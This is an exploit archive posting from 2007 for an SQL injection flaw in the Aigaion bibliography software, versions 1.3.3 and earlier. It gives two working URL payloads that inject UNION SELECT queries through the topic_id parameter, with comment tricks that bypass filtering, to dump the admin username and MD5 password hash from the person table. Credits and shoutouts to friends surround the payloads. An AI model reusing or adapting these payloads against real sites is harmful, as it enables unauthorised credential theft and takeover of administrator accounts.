Home / os / winme

aigaion-sql.txt

Posted on 10 July 2007

--==+================================================================================+==-- --==+ Aigaion <= 1.3.3 SQL Injection Exploit +==-- --==+================================================================================+==-- DISCOVERED BY: Cody "CypherXero" Rester PAYLOAD: Admin username and MD5 Hash WEBSITE: http://www.cypherxero.net Shoutouts to my friends darkfusion and magikgrl for being fucking awesome. w0rd. --==+================================================================================+==-- EXPLOITS: http://www.website.com/index.php?page=topic&topic_id=9999/**/UNION/**/SELECT/**/ALL/**/null,null,CONCAT(login,CHAR(58),password),null/**/FROM/**/person/**/WHERE/**/ID=1-- http://www.website.com/index.php?page=topic&topic_id=9999/**/UNION/**/SELECT/**/ALL/**/null,null,password,null/**/FROM/**/person--

 

TOP